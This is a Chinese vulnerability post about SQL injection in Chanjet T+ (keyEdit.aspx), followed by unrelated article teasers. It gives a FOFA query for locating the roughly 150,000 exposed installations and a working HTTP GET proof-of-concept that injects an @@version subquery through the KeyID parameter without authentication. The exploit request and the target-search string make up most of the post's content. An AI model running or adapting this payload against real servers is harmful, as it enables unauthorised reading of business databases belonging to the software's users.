用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞

news/2024/9/23 7:21:10

漏洞描述:

该漏洞是由于畅捷通T的/tplus/UFAQD/keyEdit.asp接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者可以利用SQL注入漏洞获取数据库中的信息

fofa: app="畅捷通-TPlus"

POC:

GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xxx.xxx.xxx
Accept-Charset: utf-8

漏洞复现:

在fofa中搜索资产,有15万条资产

image-20240513175157732

对目标资产构建语句

image-20240513175406611

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/31273.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

vue3编译优化之“静态提升”

本文讲了vue3是如何实现编译优化之“静态提升”,静态节点无需每次执行render函数都去生成一次虚拟DOM前言 在上一篇 vue3早已具备抛弃虚拟DOM的能力了文章中讲了对于动态节点,vue做的优化是将这些动态节点收集起来,然后当响应式变量修改后进行靶向更新。那么vue对静态节点有…

toLua中Lua调用C#中的类

toLua中Lua调用C#: [7]Lua脚本调用C#中的class 准备工作:打算在Lua脚本中使用Debug,使用lua调用C#脚本,需要绑定LuaState和自定义添加Debug--- --- Generated by EmmyLua(https://github.com/EmmyLua) --- Created by TonyChang. --- DateTime: 2024/5/14 6:55 --- print(&…

《食品小经营登记证》办理流程

第一步:登录甘肃政务服务网第二步:选择区域第三步:点击“一件事服务”填写“申请者基本信息”选择“经营项目”上传身份证一路涉足、一路留恋、一路回望。依旧前行。

库的移植和使用---例子:JPEG的解码和编码

库的通用移植安装步骤,以及库的使用步骤学习;以JPEG库作为例子进行学习目录开源库移植步骤[1]:下载库的源码包[2]:解压,且阅读“README(自述文件)",了解对应库的使用规则[3]:打开源码中的install.txt的文本,学习库的移植和安装步骤[4]:把下载好的源码包jpegsrc.…

C#.Net筑基-模式匹配汇总

从C#7开始支持的 模式匹配 语法(糖,挺甜),可非常灵活的对数据进行条件匹配和提取,经过多个版本的完善,已经非常强大了。01、模式匹配概述 从C#7开始支持的 模式匹配 语法(糖,挺甜),可非常灵活的对数据进行条件匹配和提取,经过多个版本的完善,已经非常强大了。 C# 支…

全面系统的AI学习路径,帮助普通人也能玩转AI

前言 现如今AI技术和应用的发展可谓是如火如荼,它们在各个领域都展现出了巨大的潜力和影响力。AI的出现对于我们这些普通人而言也是影响匪浅,比如说使用AI工具GPT来写文档查问题、使用AI辅助编程工具帮助我们写代码、并且可是使用AI来实现人工客服等。那么普通人如何学习AI呢…

python3脚本调整歌词文件时间戳

场景:截取部分音乐文件,对应歌词的时间要做相应调整。 例如:下方歌词文件,只需要 [00:28] 及以后的内容,而且将第一句 ( [00:28]月光 把天空照亮 )的时间改成 [00:01],那么第二句的时间应该是 [00:06],第三句的时间应该是 [00:12],以此类推 歌词文件中,时间的格式…

GPU算子计算与调度技术

GPU算子计算与调度技术 9.4.1 GPU内核驱动分析概述 不同CPU相比,GPU中包含了大量的并行计算单元,适合处理像素,矩阵,坐标等大量同类型的数据,因此,很多LINUX上的应用程序为了能够利用GPU的加速功能,都试图和GPU直接打交道,因此,系统中可能有多个组件或者程序同时使用G…